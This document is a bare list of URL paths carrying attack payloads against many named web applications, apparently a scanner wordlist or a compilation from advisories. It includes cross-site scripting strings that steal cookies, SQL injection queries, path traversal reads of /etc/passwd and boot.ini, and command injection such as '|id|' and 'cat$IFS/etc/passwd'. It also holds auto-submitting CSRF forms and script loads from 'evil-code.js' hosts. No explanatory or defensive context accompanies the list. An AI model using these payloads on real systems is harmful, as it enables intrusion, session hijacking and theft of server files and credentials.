/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>
/includes/video_ad.php?pic_id=[XSS]
/linkvideos_listing.php?category=[XSS]
/templates/header1.php?id=[XSS]
/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]
/embed.php?name="><script>alert(document.cookie);</script>
/info.php?name="><script>alert(document.cookie);</script>
/lyrics.php?id="><script>alert(document.cookie);</script>
/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>
/classifiedsscript/index.php?a=5&b=341+and+1=1 <= TRUE
/classifiedsscript/index.php?a=5&b=341+and+1=2 <= FALSE
/classifiedsscript/index.php?a=5&b=341+AND SUBSTRING(@@version,1,1)=5 <= TRUE
/classifiedsscript/index.php?a=5&b=341+AND SUBSTRING(@@version,1,1)=4 <= FALSE
/webstat/stat/mostvisitpage.php?nopagesmost=10&nodayshow=1>&#039;><ScRiPt %0A%0D>alert(409241484347)%3B</ScRiPt>
/webstat/stat/visitorduration.php?nodayshow=1>&#039;><ScRiPt %0A%0D>alert(409241484347)%3B</ScRiPt>
/webstat/stat/pageviewerschart.php?date=1>&#039;><ScRiPt %0A%0D>alert(409241484347)%3B</ScRiPt>
/webstat/stat/pageviewers.php?date=1>&#039;><ScRiPt %0A%0D>alert(409241484347)%3B</ScRiPt>
/webstat/stat/pageviewerschart.php?date=1>&#039;><ScRiPt %0A%0D>alert(409241484347)%3B</ScRiPt>
/webstat/stat/referer.php?date=1>&#039;><ScRiPt %0A%0D>alert(409241484347)%3B</ScRiPt>
/scripts/articledirectory-seo/index.php?q=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&page=search
/publications/index.php?author=1<iframe/+/onload=alert(5555555)>
/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
/index.php/mail/auth/processlogin?emailName=&lt;emailName&gt;&amp;emailDomain=&lt;emailDomain&gt;&amp;cssStyle=original&amp;email=&lt;email&gt;password=&lt;password&gt;&amp;requestedServer=&amp;MailType=&lt;script&gt;alert(document.cookie);&lt;/script&gt;
/index.php?searchstring=1>&#039;><ScRiPt%20%0a%0d>alert(400760821437)%3B</ScRiPt>
/search/ in input search 
/livelink/livelink?func=ll&objId=514&objAction=browse&viewType=aa">[XSS]
/livelinkdav/nodes/OOB_DAVWindow.html?func=oobget&nodeid=514&support=/livelinksupport/&setctx=');[XSS]
/livelink/livelink?func=ll&objid=1&objAction=browse&sort=[XSS] 
/index.php?param=1&nyelv_id=4&mappa=../../../../../../../etc/passwd%00
/index.php?param=1&lap=<script>alert(document.cookie)</script>&bejelentkezes=nincs
/dir/add_cat.php?cat=1>&#039;><ScRiPt %0A%0D>alert(308857346746)%3B</ScRiPt>
/dir/add_url.php?cat=1>&#039;><ScRiPt %0A%0D>alert(317287773544)%3B</ScRiPt>
/demos/net_marketing/faqs.php?cat="><script>alert(document.cookie);</script>
/users/payment.php?order_id="><script>alert(document.cookie);</script>
/metasearch/index.php?url=evilcode.txt?&file=Search 
/links_style1/?id_category=1&feat=1%00"&#039;><ScRiPt%20%0a%0d>alert(310243950025)%3B</ScRiPt>
/links_style1/index.php?id_category=0&feat=1>"><ScRiPt %0A%0D>alert(325194346916)%3B</ScRiPt>
/demo/astrology/celebrities.php?month=01&day=1<ScRiPt %0A%0D>alert(309147116220)%3B</ScRiPt>
/celebrities.php?month=01&day=1<ScRiPt %0A%0D>alert(309147116220)%3B</ScRiPt>
/paypalshopping/index.php?cid="><script>alert(document.cookie);</script>
/paypalshopping/index.php?txtkeywords=%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&cmdSearch=Search
/paypalshopping/index.php?cid=7%20union%20all%20select%201,2,3,version(),5,6,7--
/paypalshopping/index.php?cid=1%20AND%201=null+union+select+1,2,3,version(),5,6,7--
/hubscript/demo/single_winner1.php?bid_id= XSS TO ADD
/script/freelancer/placebid.php?id= ADD THIS XSS
/script/freelancer/post_resume.php?jobid= ADD THIS XSS
/account.php?smw&red_url=1>"><ScRiPt %0A%0D>alert(322094267678)%3B</ScRiPt>
/demo/assets/js/ddcart.php?sid=1<script>alert(649442730777)</script>
/demo/includes/ajax/getstate.php?country=1&prefix=1>"><ScRiPt %0A%0D>alert(712244301211)%3B</ScRiPt>
/demo/index.php?page=1&search=1>"><ScRiPt %0A%0D>alert(312759321896)%3B</ScRiPt>
/demo/search.php?search=1<script>alert(308229169208)</script>
/demo/login.php?redirect=1>"><ScRiPt %0A%0D>alert(381490124289)%3B</ScRiPt>
/demo/productdetail.php?product=1>"><ScRiPt %0A%0D>alert(387540356725)%3B</ScRiPt>
/ezarticles/articles_1/articles.php?id=6&title=1<script>alert(309558774901)</script>
/ezarticles/ezodiak/index.php?sign=1>"><ScRiPt %0A%0D>alert(309408771751)%3B</ScRiPt>&date=20090717
/photos/tags/1<body+onload=alert(323052257059)>2009-07-20
/user_addfood.php?date=1>"><ScRiPt %0A%0D>alert(316624303488)%3B</ScRiPt>
/user_forgot_pwd_form.php?info=1<script>alert(394944650346)</script>
/user_login.php?info=1<script>alert(311454197400)</script>
/user_login.php?info=7&return=1>\"><ScRiPt+%0A%0D>alert(390214587228)%3B<%2FScRiPt>
/proxysite/index.php?act=whois&ip=1>"><ScRiPt %0A%0D>alert(319788800356)%3B</ScRiPt>
/ultraclassifieds/listads.php?c=69&cn=apartments&sn=1>"><ScRiPt %0A%0D>alert(317944247288)%3B</ScRiPt>
/ultraclassifieds/subclass.php?c=18&cname=1<script>alert(308954043099)</script> 
/web_tv_v3/?chn=1<script>alert(308238444762)</script>
/littlesite/index.php?file=../../../../etc/passwd 
/addlink.php?txtName=1&txtEmail=1&1&txtHURL=1&txtLURL=1&slctCategories=null+union+all%20select+1,version(),3--&txtSlogan=1&txtDescription=1&cmdPreview=Preview--
/cjdynamicpollprov2/admin/admin_index.php/"><script>alert(document.cookie);</script>
/print.php?id=1&pid=-1%20or%201=1 
/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http
/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=5 TRUE
/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=4 FALSE
/hangman/index.php?letters=A&n=1%20and%201=1+union+select+1,version()-- 
/index.php?letters=1>"><ScRiPt %0A%0D>alert(308637108657)%3B</ScRiPt>&n=601
/script/honesttraffic/index.php?msg=1%3Cscript%3Ealert(313706764927)%3C/script%3E
/path/fetchmailprefs.php?actionID=fetchmail_prefs_save&fm_driver=imap&fm_id=zzz%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3Cx+y%3D%22&fm_protocol=pop3&fm_lmailbox=INBOX&save=Create
/hotscriptsclonetypephpscript/feedback.php?msg="><script>alert(document.cookie);</script>
/hotscriptsclonetypephpscript/index.php?id=1&msg="><script>alert(document.cookie);</script>
/hotscriptsclonetypephpscript/lostpassword.php?msg="><script>alert(document.cookie);</script>
/autoportal10/index.php?page=en_Home&car=[SQL Injection] 
/up/demo_page.php?action=vote&pid=test_poll&clr=1>&#039;><ScRiPt%20%0a%0d>alert(310294726286)%3B</ScRiPt>
/index.php/"><script>alert("XSS")</script>
/standard_2006/grabber.php?grab_url=1%3Cscript%3Ealert(1192520984065)%3C/script%3E
/standard_2006/members.php?cs_message=1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert(846719933916)%3B%3C/ScRiPt%3E
/standard_2006/resource/games/memory/memory.php?step=show_ins&cat=1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(1295561226285)%3B%3C/ScRiPt%3E
//www.www.example.com/gold_2008/resource/games/ephotohunt/ephotohunt.php?step=show_ins&cat=1>"><ScRiPt %0A%0D>alert(416118610559)%3B</ScRiPt>
/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 
/admin.php?module=blog&page=newpost" method="post" name="main" >
/anzeiger/start.php?go=rubrik&id=[SQL] 
/anzeiger/start.php?go=[RFI] 
/patch/home.php?page=[rfi] 
/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script>
/surgeweb?username_ex="/><scri<script>alert(document.cookie);</script><input type="hidden 
/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice== 
/index.php?Login=<script>alert(&#039;xss&#039;)</script>
/index.php?Password=<script>alert(&#039;xss&#039;)</script>
/scripts/guestbook/test2/?page=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(309018679930)%3B%3C/ScRiPt%3E&order=asc
/topsites/vote.php?u=RGVtb24=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(314888759311)%3B%3C/ScRiPt%3E
/suchauftraege_user.php?userid=[SQL] 
/vote.php?descr=[SQL] 
/public/index.php?search="&#039;><script>alert(&#039;xss&#039;)</script>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
/doceboLms/index.php?modname=advice&op=upadvice" method="post" name="main" > <input type="hidden" name="idAdvice" value="2" /> <input type="hidden" name="title" value="Hello" /> <input type="hidden" name="description" value='1"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addadvice" value="Save changes" /> </form> <script> document.main.submit(); </script> 
/administrator/index2.php?option=com_content&sectionid=0&task=edit&hidemainmenu=1&id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c 
/plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E%3Cscript%3E/*%20
/www/html/11-login.asp?intPassedLocationID=57%27%22%3E%3Cscript%3Ealert%2834%29%3C/script%3E
/_userdetails/index.php" name="g" id="g"> <input type=hidden name="name" value=""> <input type=hidden name="email" value=""> <input type=hidden name="moderation" value="no"> <input type=hidden name="publiccoments" value="no"> <input type=hidden name="receivenotifications" value="no"> <input type=hidden name="password1" value="password"> <------ Eye with this <input type=hidden name="password2" value="password"> <------ Eye with this <input type=hidden name="flag[commentwall_access]" value="LOGGED_IN"> <input type=hidden name="lang" value=""> <input type=hidden name="flag[sidebarsidebar-profile]" value="yes"> <input type=hidden name="flag[sidebarsidebar-communities]" value="yes"> <input type=hidden name="flag[sidebarsidebar-blog]" value="yes"> <input type=hidden name="flag[sidebarsidebar-friends]" value="yes"> <input type=hidden name="visualeditor" value="yes"> <input type=hidden name="action" value="userdetails
/?section_copy_id=1005176%27%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
/?section_id=1002815%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS] 
/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 
/system/admin.php" method="post" name="main" enctype="multipart/form-data" >
/menu/admin/index.php?op=saveItem" method="post" name="main" >
/pages/admin/index.php?op=editPage1" method="post" enctype="multipart/form-data" >
/core/admin/profil.php" method="post" name="main" >
/core/admin/statique.php" method="post" name="main" >
/core/admin/article.php" method="post" name="main" >
/core/admin/parametres_base.php" method="post" name="main" >
/">
/demo/photovote/login.php?page="><script>alert(document.cookie);</script> 
/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00
/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http
/manual/caferss/example.php?rssfeedURL="%20onmouseover=prompt(1)%20xss="&submit=OK
/modules/news/archive.php?subm="><script>alert(1)</script>
/modules/news/topics.php?subm="><script>alert(1)</script>
/modules/contact/index.php?op=contact&subm="><script>alert(1)</script>
/log.php"][/img]
/servlet/webacc?User.Id="><STYLE>BODY{-moz-binding
/scripts/evil-code.js%3E%3C/script%3E
//www.www.example2.com/scripts/evil-code.js></script>
//www.www.example2.com/scripts/evil-code.js></script>
//www.www.example2.com/scripts/evil-code.js></script>
/servlet/webacc?Error=[XSS]
/servlet/webacc?User.html=[XSS] 
/[path]/login.php?mode=forgot&forgot=[xss]
 $0 www.example.com/cgi-bin/ws_mail.cgi\n"}
/sresult.exe?cam=[code]
/cgi-bin/math_sum.mscgi?a=[code]&b=[code]
/texis.exe/?-version 
/texis.exe/?-dump
/WebAdmin.dll?session=X&Program=MDaemon&Directory
/cgi-bin/search/show.pl?url=http
/cgi-bin/search/show.pl?url=http
/cgi-bin/search/show.pl?url=http
/cgi-bin/search/show.pl?url=ftp
/cgi-bin/search/show.pl?url=ftp
 $0 www.example.com/cgi-bin/ustore.pl\n"}
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../directory/filename.ext%00.html&passurl=/category/
/cgi-bin/apexec.pl?template=/etc/passwd%%0000.html 
/cgi-bin/search/show.pl?url=file
/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]
/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]
 $0 www.example.com/cgi-bin/ws_mail.cgi\n"}
/cgi/example?test=<script>alert('xss')</script> 
/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd 
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
/cgi-bin/ikonboard/help.cgi?helpon=../members/[member].cgi%00
/cgi-bin/non-existent.pl
/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
/cgi-bin/perlcal/cal_make.pl
/cgi-bin/perlcal/cal_make.pl
/index.cgi
/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
/ping.cgi?ip=localhost%26%26touch+/tmp/test 
/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=<script>alert('XSS')</script> 
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/cgiwrap/%3CS%3E
/cgi-bin/cgiwrap/<S>
/cgi-bin/cgiwrap/~nneul/<S>TEST</S>
/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
/cgi-bin/cgiwrap/<IMG%20SRC=javascript
/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http
/cgi-bin/math_sum.mscgi?a=[AAA...x86...AAA]
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
 $0 www.example.com/cgi-bin/blah/classifieds/admin.cgi\n"}
/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT> 
/pdestore.cgi?product=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/pdestore.cgi?product=jewelry&cart_id=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../../../[file]
/ShowVideo?1&fullnocount&/../../../../../../../../../../[file]
/ShowGraphic?/../../../../../../../../[file] 
\ncenex.pl <www.example.com> </path/> \"cmd\"\n";
/index.pl?mode=html&fn=|uname%20-a| 
/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script> 
/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
/user.cgi?url="><iframe%20src="http
/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd 
/cgi-bin/guestbook/passwd 
/cgi-bin/eboard40/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../../etc/passwd%00 
/cgi-bin/discus/board-post.cgi?HTTP_REFERER=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&preview=1&message=&username=&passwd=&active_links=1&active_links_a=1 
/cgi-bin/admincenter.cgi admin wordlist.txt yes |
/cgi-bin/admincenter.cgi admin wordlist.txt no  |
/pkmslogout?filename=../../../../../../../etc/passwd 
/sql-ledger/am.pl?login=../../../home/user/foo.pl%00&action=add_department 
/YaBB.pl?board=;action=imsend;to=%22%3E%3Cscript%3Ealert(document
/admin/index.pl?Action=AgentTicketPlain&ArticleID=1&TicketID=1%20[SQL_HERE]
/admin/index.pl?Action=AgentTicketPlain&TicketID=1&ArticleID=1%20[SQL_HERE]
/cgi-bin/interaktiv.shop/front/shop_main.cgi?func=det&wkid=41587822301246215&rub1=Footprints&rub2=Architect&artnr=114&pn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
/cgi-bin/interaktiv.shop/front/shop_main.cgi?func=searchdo&sfields=&wkid=41587822301246215&rub1_search=all&sfield=1&sbeg=%22%3Cscript%3Ealert('r0t')%3C/script%3E
/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
/cgi-bin/tseekdir.cgi?location=/etc/passwd%00 
/item.pl?item=<script>alert("XSS")</script> 
/scripts/cart32.exe/GetLatestBuilds?cart32=&lt;script&gt;alert('XSS')&lt;/script&gt; 
/cgi-bin/FileSeek.cgi?head=&foot=;id|
/cgi-bin/FileSeek.cgi?head=;id|&foot=
/cgi-bin/FileSeek.cgi?head=&foot=|id|
/cgi-bin/FileSeek.cgi?head=|id|&foot=
/ts.exe?tsurl=0.1.0.0
/cgi-bin/index.cgi?action=[code]
/cgi-bin/index.cgi?action=&id=[code]
/cgi-bin/index.cgi?action=forum&board=chitchat&op=&num=[code]
/cgi-bin/index.cgi?action=&board=[code]
/cgi-bin/index.cgi?action=&cat=[code]
/cgi-bin/index.cgi?action=otherarticles&writer=[code]
/cgi-bin/index.cgi?action=&viewcat=[code]
/cgi-bin/index.cgi?action=printtopic&id=1&curcatname=&img=[code]
/cgi-bin/index.cgi?action=printtopic&id=1&curcatname=[code]
/admin/restartMessage.shtml?server=<iframe%20style=visibility
/pbpgst.cgi?keyval=[XSS]
/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora 
/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20><SCRIPT>alert(document.cookie)</script><!-- 
/cgi-bin/im_trbbs.cgi?uid=parameter&df=bbs.dat|ls| 
/AUTH=[some_value]/user/advanced.tagz?Site=www.example.com&Mailbox=<[html_code]>
/scripts/wgate.dll?~service=--><img%09src=javascript
/admin.cgi?action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
/admin.cgi?action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
/admin.cgi?action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
/admin.cgi?action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
/admin.cgi?action=modifypost&entryid=66&password=&lt;/textarea&gt;<script>alert('wvs-xss-magic-string-723975367');</script>
/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]&month=[SECOND SCRIPT]
/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=[THIRD SCRIPT]
/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id| 
/idm/siteName/ims_mainconsole_principalpopuphandler.do?searchAttrs0=%25GROUP_NAME%25&searchOperators0=EQUALS&searchFilter0=&searchOrgDN=specifiedDNValue&incChildrenOrgFlag=NO&resultsPerPage=10&oid=&imsui_taskstate=RESOLVE_SCOPE&imsui_tpnametosearch=group&numOfExpressions=1%00<script>alert(document.cookie)</script> 
/cgi-bin/nph-exploitscanget.cgi?host=%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E&port=80&idsbypass=0&errchk=1 
/GWExtranet/scp.dll/frmonth?filter=<EvilScript>
/GWExtranet/scp.dll/frmonth?user=<EvilScript>
/GWExtranet/scp.dll/frmonth?month=<EvilScript>
/GWExtranet/scp.dll?user=USERID&template=<EvilScript> 
/hc/hc?d=mes&x=20433&ntb=[numericParam]
/index.pl?Action=Login&User=%27[SQL_HERE]
/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E 
/lstat/lstat.cgi?obj=wg104&template=../../../../../../../../etc/passwd&from=-1m&to=now
/webapps/blackboard/execute/viewCatalog?type=Course&searchText=?><script>alert(?xss?)</script>
/cgi-bin/ion-p.exe?page=c
/cgi-bin/ion-p?page=../../../../../etc/hosts 
/perl/webcal.cgi?function=<script>alert(document.cookie)</script>&cal=public
/perl/webcal.cgi?function=webyear&cal=public&year=<script>alert(document.cookie)</script>
/perl/webcal.cgi?function=webday&cal=public&date=<script>alert(document.cookie)</script> 
/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
/cgi-bin/emsgb/easymsgb.pl?print=|id| 
/AUTH=[some_value]/user/members.tagz?Site=www.example.com&Mailbox=[html_code]
/cgi-bin/SGB_DIR/superguestconfig 
/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001 
/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;" 
/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http
/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox
/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1
/parse.pl?file=html/english/xp/xplogin.html
/showmail.pl?Folder=<script>alert(document.cookie)</script> 
/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en 
/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll 
/main.cgi?next_file=poop<script>alert('scriptX 
//admin/user.pl 
/cgi-bin/esp?PAGE=<script>alert(document.domain)
/cgi-bin/path_to_file/bsml.pl?action=empty
/cgi-bin/path_to_file/bsml.pl?action=sm
/cgi-bin/path_to_file/bsml.pl?action=edit 
//PUBLIC/ADMIN/INDEX.HTM
/webcgi/webbatch.exe?XSS
/webcgi/webbatch.exe?PATH/XSS 
/cgi-bin/awstats.pl?update=1&logfile=|/bin/ls| 
/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5 
/cgi-bin/anyboard.cgi/?cmd=sinfo&all=1 
/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00 
/awstats/awstats.pl?config=HACKdestailleur.fr 
/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=[xss]
/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=[xss] 
/servlet/ContentServer?pagename=<body%20onload=alert(document.cookie);> 
/reply.pl?board=1&article=81&inreplyto=[XSS]&[member]=yes
/reply.pl?board=1&article=[XSS]&inreplyto=0&[member]=yes
/reply.pl?board=[XSS]&article=81&inreplyto=&[member]=yes
/cgi-bin/kaiseki.cgi?file.exetension|command|
/cgi-bin/kaiseki.cgi?|command| 
/webmail/init.emu
/%00
/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z
/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00
/./cgi-bin/targetfile 
/ sitenews.cgi?update\?oldsubject=OLD_SUBJ&subject=NEW_SUBJ&name=ANY_NAME&issue=ISSUE&message=MESSAGE
/server/otre/index/pl?Action=AgentTicketMailbox&Subaction=[xss] 
/hc/hc/fake.doc?d=fc&o=dwnd&fid=1189762&did=89777&x=16080&doc_ext=.txt
/1search.cgi?q=[XSS]&boolean=ALL&case=Insensitive 
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e 
/ts.cgi?c
/ts.cgi?c
/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
/AUTH=[some_value]/user/general.tagz?Site=www.example.com&Mailbox=[html_code]
/cgi-bin/bgplg?cmd=show+version<script>alert("OpenBSD%20XSS)</script> 
/go.cgi?|id|
/go.cgi?artarchive=|id|
/index.cgi?c=search&s=ok&id=191&kword=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=&max=
/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=&max=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
/index.cgi?c=search&s=ok&id=191&kword=&f=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E 
/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd 
/wholite.cgi?dom= xss_code &tld=com&action=search 
/pages/htmlos/%3Cscript%3Ealert(document.domain);%3C/script%3E
/cgi-bin/erba/start/%3Cscript%3Ealert(document.domain);%3C/script%3E
/WebGUI/index.pl/homels?func=add;class=WebGUI
/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever] 
/main.cgi?next_file=/etc/passwd 
/stats.pl?action=branchdetail&branch=[XSS]&view=posts&[member]=yes
/stats.pl?action=boarddetail&board=[XSS]&view=posts&[member]=yes
/stats.pl?action=userdetail&user=[XSS]&view=posts&[member]=yes
/scripts/mailpost.exe/<script>alert('hi')</script>/mail.txt
/inbox/message.fts
/inbox/message.fts?folder=Sent%20Items&id=test 
/cgi-bin/dose.pl?daily&somefile.txt&|ls|
/edittag/mkpw.pl?plain=XSS
/cgi-bin/haydn.exe?VHTML_FILE=test<body>
/AUTH=[some_value]/user/?Site=www.example.com&Mailbox=[html_code]
/SCRIPTS/WA-MSD.EXE?A0=<IMG%
/SCRIPTS/WA-USIAINFO.EXE?
/Scripts/wa-demo.exe?A1=ind9807&L=demo<img>
/bin/common/addressbook.pl?action=ADD&nav=my_addressbook&course='%3E%3Cscript%3Ealert('DarCNesS')%3C/script%3E
/bin/common/tasks.pl?action=c&display=T.subject&filter=--!!all&course_id=&render_type='%3E%3Cscript%3Ealert('DarCNesS')%3C/script%3E
/bin/common/calendar.pl?course_name=%22%3E%3Cscript%3Ealert('DarCNesS')%3C/script%3E
/bin/common/calendar.pl?courseID=%22%3E%3Cscript%3Ealert('DarCNesS')%3C/script%3E
/bin/common/calendar.pl?subroutine=%22%3E%3Cscript%3Ealert('DarCNesS')%3C/script%3E
/cgi-bin/mb.cgi?action=showmessage&topicnumber=1&threadnumber=7
/cgi-bin/communimail/mailadmin.cgi?saction=show_contacts&list_id=[XSS]
/edittag/edittag_mp.cgi?file=INJECT
/web_reports/cgi-bin/InfoStation.cgi?mod=login&func=process&database=1&lang_code=en&report_group=Adm&filter=aaa&username=[SQLI]&password=[SQLI]
/admin.cgi?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt; 
/cgi-bin/cart.pl?db=' 
/dana-na/auth/remediate.cgi?action=&step=preauth
/dana-na/auth/remediate.cgi?step=preauth 
/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)// 
/mod_perl/inmail.pl?acao=<<h1>opss!</h1>
/mod_perl/inshop.pl?screen=<script>alert(document.cookie);</script>
/cgi-bin/boardpower/icq.cgi?action=<script>javascript
/index.pl?QueueID=%22%3E%3Cscript%3Ealert('[XSS_HERE]')%3B%3C/script%3E%3Cx%20y=%22
/index.pl?Action="><script>alert(document.title);</script><x%20" 
/cgi-bin/webplus.exe?script=/webpshop/department.wml&deptid=3&deptname=[XSS]
/cgi-sys/FormMail.cgi?<script>alert("test");</script> 
/cgi-bin/jammail.pl?job=showoldmail&mail=|command| 
/cgi-bin/awstats-6.4/awstats.pl?debug=1
/cgi-bin/awstats-6.4/awstats.pl?debug=2 
/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd 
/oliver/gateway/gateway.exe?X_=000f&application=Oliver&displayform=main&updateform="><script>alert("XSS");</script> http
/forum.cgi?forum=[XSS]
/axoverzicht.cgi?maand=[XSS]
